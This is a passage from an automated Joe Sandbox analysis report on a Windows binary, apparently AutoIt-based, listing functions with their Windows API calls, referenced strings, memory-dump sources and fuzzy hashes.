Opcode Fuzzy Hash: e9afc842bf5a5af070ffb24bc069d2920d84a7ede88a8a271a8f7c439d40a7d2
Instruction Fuzzy Hash: FB618E31205281AFD711DF15C498F25BBE5AF88318F18849CE5568B793C77AEC45CB92

Function 007CBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007CBCFD
IsMenu.USER32(00000000), ref: 007CBD1D
CreatePopupMenu.USER32 ref: 007CBD53
GetMenuItemCount.USER32(01215798), ref: 007CBDA4
InsertMenuItemW.USER32(01215798,?,00000001,00000030), ref: 007CBDCC

Strings

0, xrefs: 007CBCA8
2, xrefs: 007CBD37

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 5241edada0d02934f50cb0a7da7900b3396be5c60bd039c661ef37eb59a6ae27
Instruction ID: 433850d92ee33d90bfb17f0a2838b623cbed7b61f9a184dad45edcf633e08c56
Opcode Fuzzy Hash: 5241edada0d02934f50cb0a7da7900b3396be5c60bd039c661ef37eb59a6ae27
Instruction Fuzzy Hash: A851BF70B00209DBDB21CFA8D88AFAEBBF8BF45314F24815DF40297290D778A945CB61

Function 00782D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00782D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00782D53
_ValidateLocalCookies.LIBCMT ref: 00782DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00782E0C
_ValidateLocalCookies.LIBCMT ref: 00782E61

Strings

&Hx, xrefs: 00782DFE, 00782E07, 00782E18
csm, xrefs: 00782DF6

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &Hx$csm
API String ID: 1170836740-229183418
Opcode ID: af3ea5d0003fbdff11d690caaf38200209aa59d3ebf016ca94caba033420a1f6
Instruction ID: d8738822a41158cde436697aeb4c925b1520debc70d3d4980b5c1745ac33101f
Opcode Fuzzy Hash: af3ea5d0003fbdff11d690caaf38200209aa59d3ebf016ca94caba033420a1f6
Instruction Fuzzy Hash: 77419634A40209EBCF10EF68C849A9EBFB5BF44325F148155E814AB353D7399A06CBE0

Function 007F81DB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,007BF3AB,00000000,?,?,00000000,?,007B682C,00000004,00000000,00000000), ref: 007F824C
EnableWindow.USER32(00000000,00000000), ref: 007F8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 007F82D1
ShowWindow.USER32(00000000,00000004), ref: 007F82E5
EnableWindow.USER32(00000000,00000001), ref: 007F830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 007F832F

Strings

@U=u, xrefs: 007F832F

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID: @U=u
API String ID: 642888154-2594219639
Opcode ID: c89288c946e10d25c465b896194fc514dd3ea8b529f5411f4f4c1e63482fe000
Instruction ID: 69de5df74a7f24cf69c1447b9bfa165c89b49ba974a19863cb7ec22289e22ad3
Opcode Fuzzy Hash: c89288c946e10d25c465b896194fc514dd3ea8b529f5411f4f4c1e63482fe000
Instruction Fuzzy Hash: B8418334601648EFDF51CF25C999BF87BE0FB45B14F1841A9EA088B372CB35A845CB51

Function 007C4C7D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 007C4C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007C4CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007C4CEA
_wcslen.LIBCMT ref: 007C4D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007C4D10
_wcsstr.LIBVCRUNTIME ref: 007C4D1A

Strings

@U=u, xrefs: 007C4CB2, 007C4CEA

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID: @U=u
API String ID: 72514467-2594219639
Opcode ID: e07d76e3839fb00ef069be89625f40715076ff21d55721f0b20c2cfcc2d2ad0e
Instruction ID: 664c3d8f804d018260c588ff3e1624b7d7ccaffaafef33b45338cb25cd148403
Opcode Fuzzy Hash: e07d76e3839fb00ef069be89625f40715076ff21d55721f0b20c2cfcc2d2ad0e
Instruction Fuzzy Hash: 8E21F932604204BBEB256B399D59F7B7BACDF45750F10806DF90ACA1A1EAA9DC01D7A0

Function 007CC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 007CC913

Strings

info, xrefs: 007CC8B4
question, xrefs: 007CC8CC
warning, xrefs: 007CC8FC
stop, xrefs: 007CC8E4
blank, xrefs: 007CC895

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 943ddb10dfce1dcda9ff7415e6006f848fb61ce09bd5d277749e6aad124d25ad
Instruction ID: 9b36effb2780eb796a24b565e79da835f3ad054dc4e872de61f82ee1e721de21
Opcode Fuzzy Hash: 943ddb10dfce1dcda9ff7415e6006f848fb61ce09bd5d277749e6aad124d25ad
Instruction Fuzzy Hash: 2B11BB31689317FEE706AB54AC82EAB67ECDF15354B50402EF508E6282E7BCAD405369

Function 007B7439 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 007B7452
SendMessageW.USER32(?,00001328,00000000,?), ref: 007B7469
GetWindowDC.USER32(?), ref: 007B7475
GetPixel.GDI32(00000000,?,?), ref: 007B7484
ReleaseDC.USER32(?,00000000), ref: 007B7496
GetSysColor.USER32(00000005), ref: 007B74B0

Strings

@U=u, xrefs: 007B7469

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID: @U=u
API String ID: 272304278-2594219639
Opcode ID: 23fee1a0de3480ef2342fb438e0d304946deb13bab4a7e5399b535dc2b1e8af2
Instruction ID: d174b95a9a8e28ab234d1ad76c7f6cbf1e4195c47d0bceb89091c2e4ebcbcec0
Opcode Fuzzy Hash: 23fee1a0de3480ef2342fb438e0d304946deb13bab4a7e5399b535dc2b1e8af2
Instruction Fuzzy Hash: B901AD31408209EFDB125FA4DD08BFA7BB5FF04322F208060F915A71A0CB391E51EB10

Function 007CED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 007CED2A
_wcslen.LIBCMT ref: 007CED3B
_wcslen.LIBCMT ref: 007CED79
_wcslen.LIBCMT ref: 007CEDAF
_wcslen.LIBCMT ref: 007CEDDF
_wcslen.LIBCMT ref: 007CEDEF
_wcslen.LIBCMT ref: 007CEE2B
_wcslen.LIBCMT ref: 007CEE5A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: dd23cbcf3b4cda897a4591945c36167eda4aa73acc1149ccc9c12e71d1a4ec1b
Instruction ID: 795fb16889966005cbacfbc896c4574b197a4bf6ad1b8254614f1a20e60ce2e7
Opcode Fuzzy Hash: dd23cbcf3b4cda897a4591945c36167eda4aa73acc1149ccc9c12e71d1a4ec1b
Instruction Fuzzy Hash: 7C41B666C50118B6DB21FBF4888EECF77A8AF45310F50846AE518E3162FB38E645C3A5

Function 0077F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,007B682C,00000004,00000000,00000000), ref: 0077F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,007B682C,00000004,00000000,00000000), ref: 007BF3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,007B682C,00000004,00000000,00000000), ref: 007BF454

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 51e23011ef3d9a94418acf66672a066fb849f559b2fe0c6d1af98a5151ae2515
Instruction ID: 6b3008912d126fe86746e00076e1a39dd88f0ccae1598fae5480914c2e147300
Opcode Fuzzy Hash: 51e23011ef3d9a94418acf66672a066fb849f559b2fe0c6d1af98a5151ae2515
Instruction Fuzzy Hash: F241E931608680BACF359B2D8E887BA7B91AB56794F14C43CE25FD7561D63DB880CF11

Function 007C5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 007C5637
_memcmp.LIBVCRUNTIME ref: 007C5659
_memcmp.LIBVCRUNTIME ref: 007C5671
_memcmp.LIBVCRUNTIME ref: 007C5684
_memcmp.LIBVCRUNTIME ref: 007C569E
_memcmp.LIBVCRUNTIME ref: 007C56B1
_memcmp.LIBVCRUNTIME ref: 007C56C9
_memcmp.LIBVCRUNTIME ref: 007C56E4

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 3baa8885eed38e4a4cda5f820cbd427bb85a1277ce88a0e3c974aec7389827ab
Instruction ID: 681384aca113ac9914fb24cb3ec7138d91158d3788d60b3500602ee53a9844e1
Opcode Fuzzy Hash: 3baa8885eed38e4a4cda5f820cbd427bb85a1277ce88a0e3c974aec7389827ab
Instruction Fuzzy Hash: F221CCA1690919B7D61465208D86FFB335CAF11784F84002CFE046AA41FB2EFD91C3B9

Function 007E4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 007E502E, 007E5383
Not an Object type, xrefs: 007E5007

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 252cf1b668785ac20921098bee0ee3ba1379da7fd1883b436c611e1114e789c0
Instruction ID: 84b2f9433f13d8c208028024fa5414205e6b69c3695ad7c71f80a1875aa85d41
Opcode Fuzzy Hash: 252cf1b668785ac20921098bee0ee3ba1379da7fd1883b436c611e1114e789c0
Instruction Fuzzy Hash: 8AD1D171A0164E9FDF10CFA9C881BAEB7B5BF48358F148069E915AB281E774DD41CBA0

Function 007A1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,007A17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 007A15CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,007A17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007A1651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,007A17FB,?,007A17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007A16E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,007A17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007A16FB

Part of subcall function 00793820: RtlAllocateHeap.NTDLL(00000000,?,00831444,?,0077FDF5,?,?,0076A976,00000010,00831440,007613FC,?,007613C6,?,00761129), ref: 00793852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,007A17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007A1777
__freea.LIBCMT ref: 007A17A2
__freea.LIBCMT ref: 007A17AE

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: b818c4d6e12a4905f88ab76c3ea1459fb8418a742d6a4853a327671966d32107
Instruction ID: db98965d904332e8aaf88e8724d6452360251f554824616b765237b79715bbb7
Opcode Fuzzy Hash: b818c4d6e12a4905f88ab76c3ea1459fb8418a742d6a4853a327671966d32107
Instruction Fuzzy Hash: 8D91B571E002169AEF248E74C945EEE7BB5AFC6310F984759E802E7181EB3DDD50CB60

Function 007E4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007E4648
VariantInit.OLEAUT32(?), ref: 007E4749
VariantClear.OLEAUT32(?), ref: 007E4753
VariantClear.OLEAUT32(?), ref: 007E47B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 007E472C
Null Object assignment in FOR..IN loop, xrefs: 007E45D8, 007E4706, 007E47BE

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 220a3ebb4c347902650d61c63c7203053cb402cb49a916b80768ff6ca3325edb
Instruction ID: cb4ea593dff72e7fcffe25d5167dec802880b178109953ce800baf95b57da46e
Opcode Fuzzy Hash: 220a3ebb4c347902650d61c63c7203053cb402cb49a916b80768ff6ca3325edb
Instruction Fuzzy Hash: D191B471A01259EBDF20CFA6CC48FAEBBB8EF49710F108559F515AB280D7789941CFA0

Function 007D1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 007D125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 007D1284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 007D12A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007D12D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007D135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007D13C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007D1430

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: a9318164a2f5ef83d1db0f6f0427a791e3bc5727981571c6908eb64bc1830a2f
Instruction ID: a29c4663f48b46aec1e5cd1587e034dad810a9c4c159060987c8f9dd6a7cc154
Opcode Fuzzy Hash: a9318164a2f5ef83d1db0f6f0427a791e3bc5727981571c6908eb64bc1830a2f
Instruction Fuzzy Hash: 1C91BF71A00208AFDB01DFA8C888BBE77B5FF45325F54802AE901EB391D77DA941CB90

Function 0077948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: e424528bb4901874b8f5228c1fa3b6c26d90d75243959fb57f49aab7221a8683
Instruction ID: c1075550566b57c6ea1f02a6cf4b38faf2f359971204635cb47dde2c0300507c
Opcode Fuzzy Hash: e424528bb4901874b8f5228c1fa3b6c26d90d75243959fb57f49aab7221a8683
Instruction Fuzzy Hash: DB913671901219EFCF15CFA9CC88AEEBBB8FF49320F148145E615B7291D778A952CB60

Function 007E3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007E396B
CharUpperBuffW.USER32(?,?), ref: 007E3A7A
_wcslen.LIBCMT ref: 007E3A8A
VariantClear.OLEAUT32(?), ref: 007E3C1F

Part of subcall function 007D0CDF: VariantInit.OLEAUT32(00000000), ref: 007D0D1F
Part of subcall function 007D0CDF: VariantCopy.OLEAUT32(?,?), ref: 007D0D28
Part of subcall function 007D0CDF: VariantClear.OLEAUT32(?), ref: 007D0D34

Strings

AUTOIT.ERROR, xrefs: 007E3A80, 007E3A85
Incorrect Parameter format, xrefs: 007E39A6, 007E3BA1

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 489a92a28c358be73ff4e2043a6a47fc7c5d4df13c7d25f58adf4e67b4c5cc6e
Instruction ID: 2df255e46177bc923a47e5852a333e68122658bcf5af6c575ecb2951cf23201d
Opcode Fuzzy Hash: 489a92a28c358be73ff4e2043a6a47fc7c5d4df13c7d25f58adf4e67b4c5cc6e
Instruction Fuzzy Hash: 6D915574608345DFCB04DF25C48896AB7E4BF88314F14886EF88A9B351DB39EE45CB92

Function 007E4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 007C000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,007BFF41,80070057,?,?,?,007C035E), ref: 007C002B
Part of subcall function 007C000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007BFF41,80070057,?,?), ref: 007C0046
Part of subcall function 007C000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007BFF41,80070057,?,?), ref: 007C0054
Part of subcall function 007C000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007BFF41,80070057,?), ref: 007C0064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 007E4C51
_wcslen.LIBCMT ref: 007E4D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 007E4DCF
CoTaskMemFree.OLE32(?), ref: 007E4DDA

Strings

NULL Pointer assignment, xrefs: 007E4E23, 007E4E52

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 658d8877c7226be1c67efd977c6f36f386e2ada3f5eb316cf165263721d51906
Instruction ID: f1b2fbc7974b4cc5aad9b84dfd4c6c3d69050195b82899f45643120295f2a4c9
Opcode Fuzzy Hash: 658d8877c7226be1c67efd977c6f36f386e2ada3f5eb316cf165263721d51906
Instruction Fuzzy Hash: D6912571D0125DEBDF15DFA5C885AEEB7B8BF08310F108169E916B7251DB389A44CFA0

Function 007F20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 007F2183
